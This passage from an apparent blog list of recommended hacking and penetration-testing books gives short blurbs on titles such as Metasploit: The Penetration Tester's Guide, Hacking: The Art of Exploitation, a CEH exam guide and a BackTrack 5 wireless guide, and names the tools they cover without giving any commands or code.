Tool coverage includes Backtrack Linux, Google reconnaissance, MetaGooFil, dig, Nmap, Nessus, Metasploit, Fast Track Autopwn, Netcat, Hacker Defender rootkit, and more. A simple and clean explanation of how to effectively utilize these tools as well as the introduction to a four-step methodology for conducting a penetration test or hack will provide you with know-how required to jump-start your career or gain a better understanding of offensive security, which easily makes it the book to buy.

Metasploit: The Penetration Tester’s Guide

best hacking books- Metasploit: The Penetration Tester's Guide

This book deals with Penetration Testing by making use of the open source Metasploit Framework. It is beneficial for the readers who do not have any prior knowledge about Metasploit. The Metasploit Framework makes discovering, exploiting, and sharing vulnerabilities quick and relatively painless.

At the end of the book, the reader will get sufficient knowledge of penetration test. It provides you with an actual penetration test’s simulated version so as to provide you with a realistic experience.

Hacking: The Art of Exploitation, 2nd Edition

best hacking books - Hacking: The Art of Exploitation, 2nd Edition

This hacking book is a must read for beginners. It is best among many Ethical Hacking Books. This book provides you with knowledge about the obstacles beginners facing during the beginning of their ethical hacking profession. This book can help beginners do their job more professionally.

Unlike others, this book spends more time explaining the technical foundation of areas like programming, shellcode and exploitation and how things work from inside. Instead of directly taking you through tutorials, this book will first make you understand underlying mechanism and architectures and then it teaches you how to outsmart security measures, corrupt system, wireless encryption cracking and network attacks etc. Programming languages that are covered include C, Assembly Language, and Shell Scripting.

CEH Certified Ethical Hacker All-in-One Exam Guide

best hacking books- CEH Certified Ethical Hacker All-in-One Exam Guide

It is a well-written book in all Ethical Hacking Books. This comprehensive guide offers complete coverage of the EC-Council’s Certified Ethical Hacker exam. In order to take full advantage of the crisp and clear writing in this book, the reader must have some little knowledge of basic networking. The book includes relevant examples with a humorous touch to brighten the dry and mundane subject.

BackTrack 5 Wireless Penetration Testing Beginner’s Guide

BackTrack 5 Wireless Penetration Testing Beginner's Guide

Without wasting time in unnecessary justifications, this book right from the start gives you what you need. Along with the theoretical concepts, the book also consists of precise and transparent tutorials. You can easily grasp the concepts and understand the techniques to perform wireless attacks in your lab. Every new attack is described in the form of a lab exercise with rich illustrations of all the steps associated. You will be able to practically implement various attacks as you go along. It also provides a good mix of basics and high-level knowledge and works cohesively with the reader.

Besides the above, if there are any other hacking books that are useful to a beginner, do let us know in the comments below:

read more